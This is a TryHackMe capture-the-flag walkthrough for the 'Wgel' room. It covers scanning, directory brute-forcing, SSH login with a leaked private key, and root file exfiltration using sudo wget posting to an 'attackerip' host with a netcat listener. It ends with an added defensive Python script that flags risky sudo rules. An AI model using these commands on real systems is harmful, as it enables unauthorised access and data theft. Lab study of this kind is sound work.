TryHackMe — Wgel CTF
Have fun with this easy box.
Link to the room: TryHackMe | Wgel CTF
Let’s start with a rustscan enumeration.
Run rustscan -a 10.10.10.247 --ulimit 5000 -- -A -vvv -sV -sC -Pn
Looking at the results above, we have 2 ports open: 22 and 80.
Let’s view the page source on port 80.
It looks like we have found a user name: jessie.
The next step will be to brute force directories.
Run gobuster dir -u 10.10.158.73 -w /usr/share/dirb/wordlists/common.txt
Let’s check the above discovered directories.
As we can see, we didn’t manage to discover any important information.
So, I like to dig deeper with the following:
gobuster dir -u http://10.10.158.73/sitemap -w /usr/share/dirb/wordlists/common.txt
We have found a few subdirectories. Let’s check them.
After checking all the /sitemap/ subdirectories, I finally discovered something “juicy”: an id_rsa key.
Create a new file named ssh. Copy the id_rsa key and paste it into the ssh file. Change the permissions of the ssh file.
Use chmod 600 ssh.
We will attempt to log in using the id_rsa key (ssh) and the user name we found, “jessie”.
Run ssh -i ssh jessie@10.10.158.73
We successfully logged in! Let’s check for the user_flag.txt.
There we go, user flag!
The next step for us will be privilege escalation.
Run sudo -l to discover what commands we can run.
Looking at the result above, we can run /usr/bin/wget.
Navigate to GTFOBins. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
URL=http://attackerip/
LFILE=file_to_send
wget --post-file=$LFILE $URL
Open a new terminal and start a listener with nc -nvlp 34567 (port number).
Oh yeah, we’ve got the root_flag.txt.
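The sudo rule that made this possible is easy to catch in an audit. The following is an added example, not part of the original write-up: it parses `sudo -l` output and flags rules that let a watch-listed binary run as another user. The sample output, the hostname and the function name audit_sudo_l are constructed for illustration, and the watch list holds only wget, the binary from this room.

```python
import os
import re

# Binaries that can read or write arbitrary files when run as root.
# Only wget comes from the write-up; extend the set from GTFOBins as needed.
WATCHLIST = {"wget"}

# Constructed sample of `sudo -l` output (hostname and entries are made up).
SAMPLE = """\
Matching Defaults entries for jessie on host:
    env_reset, mail_badpass

User jessie may run the following commands on host:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
    (root) NOPASSWD: /usr/bin/systemctl status nginx
"""

# "(runas) TAG: TAG: cmd, cmd" as printed in the rules section of `sudo -l`.
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(text):
    """Return (severity, runas, command, reason) for each risky sudo rule."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # everything before this header is Defaults noise
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            parts = cmd.split()
            if os.path.basename(parts[0]) in WATCHLIST:
                sev = "high" if nopasswd else "medium"
                reason = "file-transfer binary runs as " + m["runas"]
                if len(parts) == 1:  # no argument pinning in the rule
                    reason += " with unrestricted arguments"
                findings.append((sev, m["runas"], cmd, reason))
            elif cmd == "ALL":
                findings.append(("info", m["runas"], cmd, "unrestricted sudo"))
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(*finding, sep=" | ")
```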
Thank you for reading, I hope you enjoyed.
You can find me on: TryHackMe | cody1